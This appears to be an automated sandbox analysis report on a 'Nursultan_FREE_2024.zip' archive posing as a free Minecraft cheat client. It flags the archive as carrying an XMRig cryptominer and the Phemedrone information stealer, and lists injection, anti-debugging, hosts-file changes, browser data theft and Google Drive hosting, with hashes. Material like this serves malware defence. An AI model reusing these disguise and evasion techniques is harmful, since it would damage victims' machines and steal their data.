Analysis Overview
SHA256
bab8b5e74ab7210b030316dd5685f3fdcceac35bd3b3a90e5dd01592f8abb630
Threat Level: Known bad
The file Nursultan_FREE_2024.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Phemedrone
XMRig Miner payload
Creates new service(s)
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Modifies file permissions
Power Settings
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Enumerates physical storage devices
Unsigned PE
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-23 13:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Nursultan_FREE_2024.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
126s
Max time network
140s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\OpenAL.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\OpenAL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (4)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\OpenAL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
135s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04c43a7a9b7883538080f84bf5b4bcba0c8b9f8a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04d00bc852751498fad759fe473fef917b51c55d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04d181f5f4d61d2215175a1e63e7caaf9b624ab2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04933f2f39e339e7ba0db0c21812cb9ff9bdce8c
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04f5636909319c54405c20ff932d92397523aa7a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (3)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
141s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\jemalloc.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\jemalloc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_tinyfd.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
141s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\SAPIWrapper_x64.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\SAPIWrapper_x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
125s
Max time network
138s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_stb.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_stb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240611-en
Max time kernel
125s
Max time network
145s
Command Line
Signatures
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\Nursultan.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 50.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
memory/2680-0-0x00007FFDFC250000-0x00007FFDFC252000-memory.dmp
memory/2680-1-0x00007FFDFC260000-0x00007FFDFC262000-memory.dmp
memory/2680-2-0x00007FFDBF4C0000-0x00007FFDC04C0000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
127s
Max time network
149s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_stb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 50.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
140s
Command Line
Signatures
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | C:\Windows\System32\bcastdvr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\GamePanel.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\GamePanel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\GamePanel.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\GamePanel.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 508 wrote to memory of 788 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\icacls.exe |
| PID 508 wrote to memory of 788 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\icacls.exe |
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\minecraft.jar
C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 0000000000070218 /startuptips
C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
memory/508-2-0x000002E71B200000-0x000002E71B470000-memory.dmp
C:\Users\Admin\Videos\Captures\desktop.ini
| MD5 | b0d27eaec71f1cd73b015f5ceeb15f9d |
| SHA1 | 62264f8b5c2f5034a1e4143df6e8c787165fbc2f |
| SHA256 | 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2 |
| SHA512 | 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c |
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 55324ec7b6e94a910826bc794b4a8900 |
| SHA1 | 6669ef463409c88ca4f9c4307c9cb38ad982dd1e |
| SHA256 | 32c0dc5b11d19ec461a1dfada26bc54db94e05e759b138dafcec1f8fff6ed5e3 |
| SHA512 | 8232de84138dd668ec05776db5800c2695e614b40471d428f794b7f801e8f2cd208ef0bf739a2ad6e45ab81cbdb57ed40ad311d4baec3d13bac22281c905941f |
memory/508-28-0x000002E7199F0000-0x000002E7199F1000-memory.dmp
memory/508-29-0x000002E71B200000-0x000002E71B470000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
139s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\windows\powershell.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| N/A | N/A | C:\ProgramData\windows\powershell.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\windows\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3456 set thread context of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4676 set thread context of 4832 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\conhost.exe |
| PID 4676 set thread context of 400 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\svchost.exe |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "835524279" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b00000000020000000000106600000001000020000000293455c186732604eb0abf0d0fb52f332fdefd8c7c21fe965dcad15f42ef9288000000000e80000000020000200000008df9160c1da26a742d84f2a81acf8c28b5e7cf874e249ffe6c5e668e83c2cda020000000f6d309d1057a7ae491957ec1e796ef80af92dafa5b88236cb8954d3b7d4c704d40000000c648aac9f818d6ebb4103e563b4cdd3823792dc2a4afb65eac9f3ba102df933369fff34f136b8e451c84a646fef346722f73199b8158dab28b77179979a941dd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0b9dd316ec5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
